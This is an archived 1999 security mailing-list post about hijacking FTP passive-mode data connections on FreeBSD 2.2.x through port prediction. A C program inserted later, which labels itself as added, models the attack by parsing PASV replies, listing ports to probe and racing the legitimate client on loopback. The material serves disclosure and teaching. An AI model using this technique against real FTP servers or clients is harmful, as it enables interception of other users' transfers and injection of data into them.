Free BSD 2.2.x listen() problem / FTP exploit
3APA3A (3APA3A@SECURITY.NNOV.RU)
Fri, 15 Oct 1999 15:04:24 +0400
- Next message: David R. Conrad: "Re: 2 dodgy network programs"
- Previous message: Mithun Bhattacharya: "Re: Window manager - implementation bug/feature ???"
Hello VULN-DEV@SECURITYFOCUS.COM,
Just to break a long silence....
Here is an exploit. It works as described in the NAI 1996 bulletin
http://www.nai.com/nai_labs/asp_set/advisory/ftp-paper.asp
Sorry if this one isn't new; just treat it as a reminder.
But.... there are two things I disagree with NAI on.
1. The ftp console client under FreeBSD 2.2.x is vulnerable.
2. Although I don't treat FTP as a secure protocol, IMHO it's an
OS/software weakness, not an FTP protocol weakness.
I've been less than a year on Bugtraq and other security-related lists, so I
don't know if this problem was already discussed. I have
neither the time nor the desire to dig for it in the archives. But the reason the exploit
works against FreeBSD seems to be an incorrect listen() implementation
together with an ftp software weakness. If this problem (with listen())
is new, please let me know and I'll report it.
Works (confirmed) against the following software under FreeBSD 2.2.1-2.2.5 (I
would be surprised if it works on some other OSes, because the problem
is specific):
1. Ftp servers (standard FTPD and WU-FTPD; it seems not to depend
on version) when clients connect in passive mode. Data can be
intercepted when transmitted from server to client.
2. Standard console ftp client. Data can be injected (the exploit
requires an ftp server running on the client machine; FTP is used to
predict the port number).
I didn't test injecting data into the FTP server in active mode or
intercepting data from the client in passive mode.
How it works:
1. Connects to the ftp server on the victim and
2. uses the PASV command to allocate a PORT on the remote machine. Then
3. attacks a few sequenced ports with connect().
4. If connect() succeeds, waits some time for data to be received. If
there is no data within the timeout, send()s data to the victim.
The exploit isn't perfect. Maybe the better way is to use RAW sockets
and send SYN packets, but:
1. (disclaimer) This exploit just shows that the vulnerability exists. You
must not use it for purposes other than testing your software.
2. Compatibility.
/\_/\
{ . . } |\
+--oQQo->{ ^ }<-----+ \
| 3APA3A U 3APA3A }
+-------------o66o--+ /
|/
http://www.security.nnov.ru
- application/octet-stream attachment: ftpspy1.c
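The following is an added illustration of the procedure the message describes; it is not the ftpspy1.c attachment and not 3APA3A's code. It parses a PASV reply into the address and port the server allocated, lists the neighbouring ports a sequential allocator would hand out next (the ports step 3 probes), and then models the race on loopback: a listener stands in for the data port a victim's PASV opened, the attacker's connect() arrives before the legitimate peer's, and the server's accept() hands the attacker the connection on which it then writes the file. The listener port, the payload text and the one-port-ahead guess window are constructed assumptions for the demo; a real attempt must probe several ports and time out as in step 4.

```c
/* Added example, not from the original post or the ftpspy1.c attachment.
   Models PASV port prediction and the data-connection race on loopback. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Parse "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" into ip/port.
   Returns 0 on success, -1 if the reply is not a well-formed 227. */
int parse_pasv(const char *reply, char *ip, size_t iplen, int *port)
{
    unsigned h1, h2, h3, h4, p1, p2;
    const char *open = strchr(reply, '(');
    if (!open || strncmp(reply, "227", 3) != 0)
        return -1;
    if (sscanf(open + 1, "%u,%u,%u,%u,%u,%u", &h1, &h2, &h3, &h4, &p1, &p2) != 6)
        return -1;
    if (h1 > 255 || h2 > 255 || h3 > 255 || h4 > 255 || p1 > 255 || p2 > 255)
        return -1;
    snprintf(ip, iplen, "%u.%u.%u.%u", h1, h2, h3, h4);
    *port = (int)(p1 * 256 + p2);
    return 0;
}

/* Ports to probe after our own PASV was given `known`: with a sequential
   allocator the victim's next data port is one of the following `count`.
   Fills `out`, returns how many were filled (stops at 65535). */
int candidate_ports(int known, int count, int *out)
{
    int n = 0;
    for (int i = 1; i <= count && known + i <= 65535; i++)
        out[n++] = known + i;
    return n;
}

/* Loopback model of the race. The listener is the data port a victim's
   PASV opened; the attacker connects before the real peer, so the server's
   accept() (FIFO over the backlog) returns the attacker's connection and
   the payload goes to the attacker. Returns 1 if the attacker read exactly
   `payload`, 0 if not, -1 on a socket error. */
int race_demo(const char *payload)
{
    struct sockaddr_in sa;
    socklen_t len = sizeof sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = 0;                    /* kernel picks a port, like PASV */

    int lfd = socket(AF_INET, SOCK_STREAM, 0);
    if (lfd < 0 || bind(lfd, (struct sockaddr *)&sa, len) < 0 || listen(lfd, 5) < 0)
        return -1;
    if (getsockname(lfd, (struct sockaddr *)&sa, &len) < 0)   /* learn the port */
        return -1;

    int attacker = socket(AF_INET, SOCK_STREAM, 0);
    int client = socket(AF_INET, SOCK_STREAM, 0);
    if (attacker < 0 || client < 0)
        return -1;
    /* Attacker's handshake completes first and is queued first. */
    if (connect(attacker, (struct sockaddr *)&sa, len) < 0) return -1;
    if (connect(client, (struct sockaddr *)&sa, len) < 0) return -1;

    int conn = accept(lfd, NULL, NULL);  /* server takes the oldest queued connection */
    if (conn < 0) return -1;
    if (write(conn, payload, strlen(payload)) < 0) return -1;
    close(conn);                         /* server is done with "its client" */

    char buf[256];
    size_t got = 0;
    ssize_t n;
    while (got < sizeof buf - 1 && (n = read(attacker, buf + got, sizeof buf - 1 - got)) > 0)
        got += (size_t)n;
    buf[got] = '\0';
    close(attacker); close(client); close(lfd);
    return strcmp(buf, payload) == 0;
}

int main(void)
{
    char ip[16]; int port, ports[4];
    if (parse_pasv("227 Entering Passive Mode (192,168,1,10,4,1)", ip, sizeof ip, &port) == 0)
        printf("PASV data port: %s:%d\n", ip, port);
    int n = candidate_ports(port, 4, ports);
    for (int i = 0; i < n; i++) printf("probe port %d\n", ports[i]);
    printf("attacker received the server's data: %s\n",
           race_demo("LIST output intended for the victim\r\n") == 1 ? "yes" : "no");
    return 0;
}
```

The loopback model removes the timing uncertainty of the real attack: here the attacker is simply first in the accept queue. Over a network the attacker has to keep connecting to each candidate port until one succeeds, which is why the message's step 4 waits for data with a timeout before deciding to inject instead.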
This archive was generated by hypermail 2.0b3 on Fri Oct 15 1999 - 10:09:34 CDT